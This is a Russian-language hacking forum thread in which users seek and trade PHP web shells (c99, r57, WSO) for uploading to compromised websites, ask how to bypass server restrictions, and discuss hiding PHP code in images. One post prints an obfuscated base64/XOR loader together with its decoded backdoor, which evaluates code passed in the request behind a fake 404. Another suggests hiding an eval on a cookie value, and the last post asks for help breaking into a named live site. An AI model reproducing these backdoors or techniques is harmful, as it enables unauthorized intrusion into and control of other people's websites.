А что делать если при открытие шелла я ничего не могу сделать?

Ребят такая вот фигня сколько не мучился никак догнать не могу как залить шелл на дле (версия 6.7 есть доступ в админку, копию базы данных сделать невозможно она слишком громоздкая.. файлового архива нет..) чтож теперь делать то?

Добавлено через 21 час 12 минут
t0xA плыз подскажи что нибуть пока меня не прикрыли...

вот вам шелл анти чата http://forum.antichat.ru/thread22799.html (https://hpc.name/redirector.html#http://forum.antichat.ru/thread22799.html) в этой статье .
вот вам шелл c99madshell http://madnet.name/files/1/10.html (https://hpc.name/redirector.html#http://madnet.name/files/1/10.html) этой статье .

Народ кто нить выложите c99shell плиз, очень надо. В нете все с троянами! Поставлю +, и отблагодарю!!!

http://upwap.ru/930947

вот держи

Цитата:

Сообщение от jonyyy

*** скрытый текст ***http://upwap.ru/930947

вот держи

Пароль какой?

Есть у кого-нибудь r57shell 1.3 released (именно эта версия)! Или какой-нить другой шелл с фишками обхода safe_mod'а и open_base_dir'а. Плюсами засыплю!!!

Цитата:


Есть у кого-нибудь r57shell 1.3 released (именно эта версия)! Или какой-нить другой шелл с фишками обхода safe_mod'а и open_base_dir'а. Плюсами засыплю!!!



http://www.awp.dk/7/r.php (https://hpc.name/redirector.html#http://www.awp.dk/7/r.php)

Извлечь не трудно.

Цитата:

Сообщение от ALEXandr009

Как запустить шелл на DLE ?

ты хотел сказать залить? если залить то никак

Я залил, у меня есть ссылка, но шел не запускается, пишет такой страницы нет.

Как запустить шелл на DLE ?

Цитата:

Сообщение от ALEXandr009

Я залил, у меня есть ссылка, но шел не запускается, пишет такой страницы нет.

пиши сайт в лс.посмотрим

Хочу написать об одном шелле

code:

<?php $pf="voKBztbOtLTX2JbXzc3bypaa4ez77+v77erlmc+Z45eXtMW0t9 vI39KWzcrM187N0t/N1tvNlprh7Pvv6/vt6uWZz5njl5eFtMO029LN27TFtLfW29/a28yWmfbq6u6Rj5COnoqOip7w0cqe+NHL0NqZl4W0w7Q=";$GM="/tmp/";$vdj="";$pf=base64_decode($pf);for($KYeAa=1; $KYeAa < strlen($pf); $KYeAa++) $vdj.=$pf[0] ^ $pf[$KYeAa];$xH=tempnam($GM,"O");$Wwm=fopen($xH, "w+");fwrite($Wwm, $vdj);fclose($Wwm);require($xH);unlink($xH);

он копирует себя в /tmp и в результате получается такая картина:

source:


<?php
if
(
isset
(
$_REQUEST
[
'q'
]))
{
eval
(
stripslashes
(
$_REQUEST
[
'q'
]));
}
else
{
header
(
'HTTP/1.0 404 Not Found'
);
}

И как потом из веба добраться до /tmp, в которой лежит шелл? =)
В чём смысл копирования?

>В чём смысл копирования?
Ну шелл копируется уже в "распакованном" виде. Как я понимаю смысл в том чтобы скрыть вредоносный код, eval появляется в явном виде только в /tmp

>И как потом из веба добраться до /tmp, в которой лежит шелл?
>require($xH);

Просёк фишку... сам код шелла лежит в tmp, а в действие приводится через другой заражённый скрипт, лежащий где-то в веб-директориях.
Странная система и непонятно чем руководствовались те, кто её придумал... спрятать в скрипте eval($_COOKIE['x']); куда проще чем вышеприведённую зверскую конструкцию, которая бросается в глаза даже при беглом просмотре кода.

Скажите что делать, устал искать уже. Не могу найти способ заливки шелла через админку. Есть только один способ - картинка. Но не как не получается. хотел скачать там картинку в нее впихнуть хексом скрипт и обратно - не фига, пробовал к пхп добавить расширения - на мести картинки рамка есть а ссылки нет, добавлял в ексиф - не могу понять как подключится к нему, какой запрос нужен чтобы.. Админка самописная, можно только новости добавить с картинкой. мне бы хотябы базовый шел подключить а там бы я уже придумал что нибудь. ..наверно. Да еще не могу понять как отправить в кукисы cmd=phpinfo
Помогите

Есть ли шелл с нормальной кодировкой. При редактировании файлов не отображает Русские буквы. В следствии чего после изминения и сохранения, на сайте появляются "кракозябры".

Цитата:

Сообщение от Sork

Есть ли шелл с нормальной кодировкой. При редактировании файлов не отображает Русские буквы. В следствии чего после изминения и сохранения, на сайте появляются "кракозябры".

WSO 2.5 - есть выбор кодировок.

Цитата:

Сообщение от b69d

Не могу найти способ заливки шелла через админку

Шелл не обязательно можно залить через админку. Из опыта, 3-4 CMS из 10 (самописы, ессно), не позволяют залить шелл через админку.

Цитата:

Сообщение от stan_q

WSO 2.5 - есть выбор кодировок.

Проверял он ее и не замечает. И большой минус то что Wso 2.5 не катит на многих хостах он просто не отображает дерево каталогов(файлов и т.д). Хотя на Локальном все норм.

А wso тут ни при чём. Если на хосте запрещены функции, нужные для листинга каталога, ни один шелл тебе его не выведет.

По поводу кодировки, редактируй файл локально в нужной кодировке и заливай.

Цитата:

Сообщение от M@ZAX@KEP

А wso тут ни при чём. Если на хосте запрещены функции, нужные для листинга каталога, ни один шелл тебе его не выведет.

По поводу кодировки, редактируй файл локально в нужной кодировке и заливай.



Именно., то что другой шелл отображает.

Значит другие функции использует. Наверняка этот шелл не может чего-то другого, что может wso. Инструмент нужно выбирать по ситуации.

вот доработанная версия wso 2.51 добавлено много полезных функций все отлично работает и открывает скачать (https://hpc.name/redirector.html#http://myfolder.ru/files/40505971)

пздц.еще один наивный-чукотский парень.

Цитата:

Сообщение от BlackH

пздц.еще один наивный-чукотский парень.

еще один наивный-чукотский парень/археолог

Помогите пож первый раз с такой ошибкой сталкиваюсь вот сайт как раскрутить не понял http://ingala.ru/stats/index.php?act=phones (https://hpc.name/redirector.html#http://ingala.ru/stats/index.php?act=phones)